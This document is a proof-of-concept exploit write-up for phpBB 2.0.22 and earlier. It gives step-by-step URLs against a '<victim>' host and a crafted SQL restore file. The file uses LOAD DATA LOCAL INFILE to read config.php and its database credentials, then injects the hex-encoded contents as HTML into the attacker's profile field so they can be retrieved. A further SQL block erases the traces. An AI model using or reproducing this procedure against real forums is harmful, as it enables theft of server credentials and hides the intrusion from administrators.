## phpBB <= 2.0.22 Remote Database Authentication Details POC
##
## This text will show you how to get the content of the file
## config.php with the 'LOCAL INFILE' SQL command. You can also
## do it with 'LOAD_FILE' but you'll need file privileges, that's
## not interesting. To do it, you'll need Administrator rights
## (we'll use admin_db_utilities.php) and  local_infile=ON
## (you don't need file privileges, that's why it's quite cool).
## PHP scripts should not permit the user to execute SQL commands.
##
## 1  Go to http://<victim>/login.php?redirect=admin/index.php&admin=1
## 2  Log in as Administrator
##
## 3  Go to http://<victim>/admin/admin_styles.php?mode[]=create&sid=<sid>
## 4  You'll get a full path disclosure, note it somewhere
##
## 5  Go to http://<victim>/admin/admin_db_utilities.php?perform=backup&sid=<sid>
## 6  Choose "Structure-Only backup" then click on "Start Backup"
## 7  Now open the file and search the table prefix, note it
##
## 8  Go to http://<victim>/admin/admin_db_utilities.php?perform=restore&sid=<sid>
## 9  Create a file which have this content [replace <phpbb_fullpath>,<user>,<prefix>]:
##    /*----------------------------------------------------------------------*/
##    CREATE TABLE tmp_hack(content text, email text, viewemail text);
##    LOAD DATA LOCAL INFILE '<phpbb_fullpath>config.php' INTO TABLE tmp_hack FIELDS
##    TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__';
##    UPDATE tmp_hack SET viewemail=(SELECT user_viewemail FROM <prefix>users WHERE
##    username='<user>'), email=(SELECT user_email FROM <prefix>users WHERE username='<user>');
##    UPDATE <prefix>users SET user_viewemail=0, user_email=
##    CONCAT('"><br/><br/><span class="gen"><b>Encoded content</b></span><br/><input',
##    UNHEX(20),'type="text" value="',
##    (SELECT HEX(content) FROM tmp_hack),'"></input><input type="hidden')
##    WHERE username='<user>';
##    /*----------------------------------------------------------------------*/
## 10 Choose the file then click on "Start Restore"
##
## 11 Go to http://<victim>/profile.php?mode=editprofile, get the encoded content
## 12 This is the encoded content of the file config.php, use the pack() function to decode it
## 13 For example, with php, type this in your shell: php -r print(pack('H*','<encoded_file>'));
## 14 Note that I encoded the file content because this can produce an SQL error (e.g. login.php)
##
## 15 If you want to clear traces, execute this SQL file [replace <prefix>,<user>]:
##    /*----------------------------------------------------------------------*/
##    UPDATE <prefix>users SET user_viewemail=(SELECT viewemail FROM tmp_hack),
##    user_email=(SELECT email FROM tmp_hack) WHERE username='<user>';
##    DROP TABLE tmp_hack;
##    /*----------------------------------------------------------------------*/
##
## by DarkFig <gmdarkfig (at) gmail (dot) com>
## http://acid-root.new.fr/
## #acidroot@irc.worldnet.net